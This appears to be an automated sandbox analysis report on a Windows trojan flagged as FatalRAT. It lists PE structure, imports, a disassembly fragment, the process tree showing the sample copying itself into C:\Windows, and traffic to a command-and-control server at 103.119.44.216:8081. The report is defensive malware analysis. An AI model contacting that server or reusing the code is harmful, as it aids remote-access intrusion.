mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, dword ptr fs:[00000000h]
mov dword ptr [ebp-04h], esi
mov dword ptr [ebp-08h], 00426E73h
push 00000000h
push dword ptr [ebp+0Ch]
push dword ptr [ebp-08h]
push dword ptr [ebp+08h]
call 00007FBA087BC91Eh
mov eax, dword ptr [ebp+0Ch]
mov eax, dword ptr [eax+04h]
and eax, FFFFFFFDh
mov ecx, dword ptr [ebp+0Ch]
mov dword ptr [ecx+04h], eax
mov edi, dword ptr fs:[00000000h]
mov ebx, dword ptr [ebp-04h]
mov dword ptr [ebx], edi
mov dword ptr fs:[00000000h], ebx
pop edi
pop esi
pop ebx
leave
retn 0008h
push ebp
mov ebp, esp
sub esp, 08h
push ebx
push esi
push edi
cld
mov dword ptr [ebp-04h], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-04h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FBA087B3F98h
add esp, 20h
mov dword ptr [ebp-08h], eax
pop edi
pop esi
pop ebx
mov eax, dword ptr [ebp-08h]
mov esp, ebp

Rich Headers

Programming Language:

[RES] VS2005 build 50727
[ C ] VS2005 build 50727
[LNK] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4b474	0xdc	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x55000	0x350b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x44c50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3d000	0x55c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x4b3ec	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3b024	0x3c000	False	0.575150553385	DOS executable (COM)	6.63103222693	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3d000	0x100c4	0x11000	False	0.317009420956	data	4.75360226837	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4e000	0x6938	0x3000	False	0.269205729167	data	3.99154476285	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x55000	0x350b8	0x36000	False	0.663113064236	data	7.40321598802	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x55b38	0x134	data	Chinese	China
RT_CURSOR	0x55c6c	0xb4	data	Chinese	China
RT_CURSOR	0x55d20	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x55e54	0x134	data	Chinese	China
RT_CURSOR	0x55f88	0x134	data	Chinese	China
RT_CURSOR	0x560bc	0x134	data	Chinese	China
RT_CURSOR	0x561f0	0x134	data	Chinese	China
RT_CURSOR	0x56324	0x134	data	Chinese	China
RT_CURSOR	0x56458	0x134	data	Chinese	China
RT_CURSOR	0x5658c	0x134	data	Chinese	China
RT_CURSOR	0x566c0	0x134	data	Chinese	China
RT_CURSOR	0x567f4	0x134	data	Chinese	China
RT_CURSOR	0x56928	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x56a5c	0x134	data	Chinese	China
RT_CURSOR	0x56b90	0x134	data	Chinese	China
RT_CURSOR	0x56cc4	0x134	data	Chinese	China
RT_BITMAP	0x56df8	0xb8	data	Chinese	China
RT_BITMAP	0x56eb0	0x144	data	Chinese	China
RT_ICON	0x56ff4	0x32028	data	Chinese	China
RT_DIALOG	0x8901c	0xce	data	Chinese	China
RT_DIALOG	0x890ec	0x60	data	Chinese	China
RT_DIALOG	0x8914c	0xe2	data	Chinese	China
RT_DIALOG	0x89230	0x34	data	Chinese	China
RT_STRING	0x89264	0x3c	data	Chinese	China
RT_STRING	0x892a0	0x54	data	Chinese	China
RT_STRING	0x892f4	0x2c	data	Chinese	China
RT_STRING	0x89320	0x82	data	Chinese	China
RT_STRING	0x893a4	0x1d0	data	Chinese	China
RT_STRING	0x89574	0x164	data	Chinese	China
RT_STRING	0x896d8	0x132	data	Chinese	China
RT_STRING	0x8980c	0x50	data	Chinese	China
RT_STRING	0x8985c	0x40	data	Chinese	China
RT_STRING	0x8989c	0x6a	data	Chinese	China
RT_STRING	0x89908	0x1d6	data	Chinese	China
RT_STRING	0x89ae0	0x110	data	Chinese	China
RT_STRING	0x89bf0	0x24	data	Chinese	China
RT_STRING	0x89c14	0x30	data	Chinese	China
RT_GROUP_CURSOR	0x89c44	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China
RT_GROUP_CURSOR	0x89c68	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89c7c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89c90	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89ca4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89cb8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89ccc	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89ce0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89cf4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89d08	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89d1c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89d30	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89d44	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89d58	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x89d6c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_ICON	0x89d80	0x14	data	Chinese	China
RT_VERSION	0x89d94	0x2cc	data	Chinese	China
RT_MANIFEST	0x8a060	0x56	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	FlushFileBuffers, LockFile, UnlockFile, SetEndOfFile, DuplicateHandle, GetCurrentProcess, GetVolumeInformationA, GetFullPathNameA, GetCPInfo, GetOEMCP, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, HeapAlloc, VirtualProtect, GetSystemInfo, VirtualQuery, HeapReAlloc, GetCommandLineA, GetProcessHeap, GetStartupInfoA, RtlUnwind, RaiseException, HeapSize, Sleep, GetTimeZoneInformation, HeapDestroy, HeapCreate, GetStdHandle, LCMapStringA, LCMapStringW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetDriveTypeA, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEnvironmentVariableA, GetThreadLocale, InterlockedIncrement, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, GlobalFlags, WritePrivateProfileStringA, FindNextFileA, FormatMessageA, LocalFree, GetFileTime, FileTimeToLocalFileTime, MulDiv, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, InterlockedDecrement, GetCurrentProcessId, SetLastError, GlobalAddAtomA, GlobalUnlock, FreeResource, GlobalFree, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, GlobalLock, lstrcmpA, GlobalAlloc, FreeLibrary, GlobalDeleteAtom, GetModuleHandleA, GetTickCount, UnmapViewOfFile, FileTimeToSystemTime, SetFileTime, WriteFile, GetFileAttributesA, LocalFileTimeToFileTime, GetCurrentDirectoryA, SystemTimeToFileTime, SetFilePointer, GetVersion, CompareStringA, GetLastError, InterlockedExchange, MultiByteToWideChar, CompareStringW, lstrlenA, ExitProcess, VirtualFree, CloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, LoadLibraryA, GetProcAddress, lstrlenW, CreateDirectoryA, FindClose, FindFirstFileA, FindResourceA, LoadResource, LockResource, SizeofResource, GetACP, WideCharToMultiByte
USER32.dll	GetSysColorBrush, UnregisterClassA, RegisterClipboardFormatA, PostThreadMessageA, LoadCursorA, SetCapture, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextA, MessageBeep, GetTopWindow, GetMessageTime, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, GetSubMenu, GetMenuItemID, GetMenuItemCount, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, OffsetRect, IntersectRect, GetWindowPlacement, GetWindowRect, GetSysColor, SystemParametersInfoA, DestroyMenu, CopyRect, UnhookWindowsHookEx, GetWindowThreadProcessId, GetLastActivePopup, LoadIconA, GetSystemMenu, AppendMenuA, IsIconic, SendMessageA, GetSystemMetrics, MessageBoxA, SetCursor, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, GetNextDlgGroupItem, InvalidateRgn, InvalidateRect, SetRect, IsRectEmpty, CopyAcceleratorTableA, CharNextA, ReleaseCapture, GetClientRect, DrawIcon, EnableWindow, CharUpperA, wsprintfA, GetDesktopWindow, PostMessageA, PostQuitMessage, SetWindowPos, MapDialogRect, GetParent, SetWindowContextHelpId, GetWindow, EndDialog, GetNextDlgTabItem, IsWindowEnabled, GetDlgItem, GetWindowLongA, IsWindow, DestroyWindow, CreateDialogIndirectParamA, SetActiveWindow, GetActiveWindow, CheckMenuItem, EnableMenuItem, GetMenuState, ModifyMenuA, GetFocus, LoadBitmapA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, GetForegroundWindow
GDI32.dll	ExtSelectClipRgn, DeleteDC, GetStockObject, GetDeviceCaps, ScaleWindowExtEx, GetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, TextOutA, RectVisible, CreateBitmap, GetWindowExtEx, GetViewportExtEx, DeleteObject, SetMapMode, RestoreDC, SaveDC, SetBkColor, SetTextColor, GetClipBox, ExtTextOutA, GetObjectA, PtVisible
comdlg32.dll	GetFileTitleA
WINSPOOL.DRV	DocumentPropertiesA, OpenPrinterA, ClosePrinter
ADVAPI32.dll	RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
SHLWAPI.dll	PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
oledlg.dll
ole32.dll	OleInitialize, CoFreeUnusedLibraries, OleUninitialize, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CoRevokeClassObject, CoTaskMemFree, CLSIDFromString, CLSIDFromProgID, OleIsCurrentClipboard, OleFlushClipboard, CoRegisterMessageFilter, CoTaskMemAlloc
OLEAUT32.dll	SysFreeString, SysAllocStringLen, VariantClear, VariantChangeType, VariantInit, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, VariantTimeToSystemTime, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy

Version Infos

Description	Data
LegalCopyright	(C) 2008
InternalName	Demo
FileVersion	1, 0, 0, 1
CompanyName
LegalTrademarks
ProductName	Demo
ProductVersion	1, 0, 0, 1
FileDescription	Demo Microsoft
OriginalFilename	Demo.EXE
Translation	0x0804 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/08/21-00:09:06.850353	TCP	2033093	ET TROJAN FatalRAT CnC Activity	49711	8081	192.168.2.3	103.119.44.216

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 8, 2021 00:09:04.315119982 CEST	49711	8081	192.168.2.3	103.119.44.216
Jun 8, 2021 00:09:04.615149975 CEST	8081	49711	103.119.44.216	192.168.2.3
Jun 8, 2021 00:09:04.615325928 CEST	49711	8081	192.168.2.3	103.119.44.216
Jun 8, 2021 00:09:06.850353003 CEST	49711	8081	192.168.2.3	103.119.44.216
Jun 8, 2021 00:09:07.355041981 CEST	8081	49711	103.119.44.216	192.168.2.3
Jun 8, 2021 00:09:22.151789904 CEST	8081	49711	103.119.44.216	192.168.2.3
Jun 8, 2021 00:09:22.152076960 CEST	49711	8081	192.168.2.3	103.119.44.216
Jun 8, 2021 00:09:37.464391947 CEST	8081	49711	103.119.44.216	192.168.2.3
Jun 8, 2021 00:09:37.464538097 CEST	49711	8081	192.168.2.3	103.119.44.216
Jun 8, 2021 00:09:52.777127028 CEST	8081	49711	103.119.44.216	192.168.2.3
Jun 8, 2021 00:09:52.777311087 CEST	49711	8081	192.168.2.3	103.119.44.216
Jun 8, 2021 00:10:08.081037998 CEST	8081	49711	103.119.44.216	192.168.2.3
Jun 8, 2021 00:10:08.081249952 CEST	49711	8081	192.168.2.3	103.119.44.216
Jun 8, 2021 00:10:23.393738031 CEST	8081	49711	103.119.44.216	192.168.2.3
Jun 8, 2021 00:10:23.393918991 CEST	49711	8081	192.168.2.3	103.119.44.216
Jun 8, 2021 00:10:38.690387011 CEST	8081	49711	103.119.44.216	192.168.2.3
Jun 8, 2021 00:10:38.690640926 CEST	49711	8081	192.168.2.3	103.119.44.216
Jun 8, 2021 00:10:54.002942085 CEST	8081	49711	103.119.44.216	192.168.2.3
Jun 8, 2021 00:10:54.003215075 CEST	49711	8081	192.168.2.3	103.119.44.216
Jun 8, 2021 00:11:09.315572977 CEST	8081	49711	103.119.44.216	192.168.2.3
Jun 8, 2021 00:11:09.316076994 CEST	49711	8081	192.168.2.3	103.119.44.216

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 8, 2021 00:08:56.035389900 CEST	50620	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:08:56.086525917 CEST	53	50620	8.8.8.8	192.168.2.3
Jun 8, 2021 00:08:56.330029964 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:08:56.373564005 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 8, 2021 00:08:57.218782902 CEST	60152	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:08:57.262460947 CEST	53	60152	8.8.8.8	192.168.2.3
Jun 8, 2021 00:08:58.165318966 CEST	57544	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:08:58.208173990 CEST	53	57544	8.8.8.8	192.168.2.3
Jun 8, 2021 00:08:59.058676004 CEST	55984	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:08:59.102731943 CEST	53	55984	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:00.227835894 CEST	64185	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:00.270365953 CEST	53	64185	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:01.408432961 CEST	65110	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:01.453335047 CEST	53	65110	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:30.188556910 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:30.231753111 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:34.763042927 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:34.837899923 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:35.200196028 CEST	60831	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:35.244720936 CEST	53	60831	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:37.143249035 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:37.185867071 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:38.094670057 CEST	53195	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:38.137175083 CEST	53	53195	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:38.992084980 CEST	50141	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:39.035404921 CEST	53	50141	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:40.218607903 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:40.263011932 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:41.128834963 CEST	49563	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:41.172029018 CEST	53	49563	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:41.990917921 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:42.035470963 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:42.785455942 CEST	59349	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:42.830626011 CEST	53	59349	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:43.724678993 CEST	57084	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:43.767020941 CEST	53	57084	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:44.971645117 CEST	58823	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:45.038573980 CEST	53	58823	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:50.698477983 CEST	57568	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:50.749862909 CEST	53	57568	8.8.8.8	192.168.2.3
Jun 8, 2021 00:09:51.253828049 CEST	50540	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:09:51.302697897 CEST	53	50540	8.8.8.8	192.168.2.3
Jun 8, 2021 00:10:06.738929987 CEST	54366	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:10:06.790261984 CEST	53	54366	8.8.8.8	192.168.2.3
Jun 8, 2021 00:10:10.729780912 CEST	53034	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:10:10.776637077 CEST	53	53034	8.8.8.8	192.168.2.3
Jun 8, 2021 00:10:18.870748043 CEST	57762	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:10:18.915154934 CEST	53	57762	8.8.8.8	192.168.2.3
Jun 8, 2021 00:10:19.844199896 CEST	55435	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:10:19.887278080 CEST	53	55435	8.8.8.8	192.168.2.3
Jun 8, 2021 00:10:42.129273891 CEST	50713	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:10:42.183485031 CEST	53	50713	8.8.8.8	192.168.2.3
Jun 8, 2021 00:10:43.265341997 CEST	56132	53	192.168.2.3	8.8.8.8
Jun 8, 2021 00:10:43.310105085 CEST	53	56132	8.8.8.8	192.168.2.3

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe PID: 5992 Parent PID: 5628

General

Start time:	00:09:02
Start date:	08/06/2021
Path:	C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe'
Imagebase:	0x400000
File size:	637064 bytes
MD5 hash:	D96987F5E2F64B880CFB3A7DE05FF0EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Vwxyab.exe PID: 1488 Parent PID: 568

General

Start time:	00:09:03
Start date:	08/06/2021
Path:	C:\Windows\Vwxyab.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Vwxyab.exe
Imagebase:	0x400000
File size:	637064 bytes
MD5 hash:	D96987F5E2F64B880CFB3A7DE05FF0EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 31%, Virustotal, Browse Detection: 50%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 1056 Parent PID: 568

General

Start time:	00:09:03
Start date:	08/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Vwxyab.exe PID: 5028 Parent PID: 1488

General

Start time:	00:09:03
Start date:	08/06/2021
Path:	C:\Windows\Vwxyab.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Vwxyab.exe Win7
Imagebase:	0x400000
File size:	637064 bytes
MD5 hash:	D96987F5E2F64B880CFB3A7DE05FF0EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 4580 Parent PID: 568

General

Start time:	00:09:30
Start date:	08/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5356 Parent PID: 568

General

Start time:	00:09:31
Start date:	08/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4128 Parent PID: 568

General

Start time:	00:09:42
Start date:	08/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 1536 Parent PID: 568

General

Start time:	00:09:42
Start date:	08/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 3492 Parent PID: 568

General

Start time:	00:09:43
Start date:	08/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5284 Parent PID: 568

General

Start time:	00:09:43
Start date:	08/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5580 Parent PID: 568

General

Start time:	00:09:44
Start date:	08/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5400 Parent PID: 568

General

Start time:	00:09:44
Start date:	08/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 4812 Parent PID: 568

General

Start time:	00:09:45
Start date:	08/06/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff6bfe20000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5944 Parent PID: 568

General

Start time:	00:09:45
Start date:	08/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 4620 Parent PID: 5944

General

Start time:	00:10:46
Start date:	08/06/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff7b3310000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4728 Parent PID: 4620

General

Start time:	00:10:46
Start date:	08/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe PID: 5992 Parent PID: 5628 #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exeCOMMON

Executed Functions

Function 00403140, Relevance: 64.9, APIs: 6, Strings: 31, Instructions: 137
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

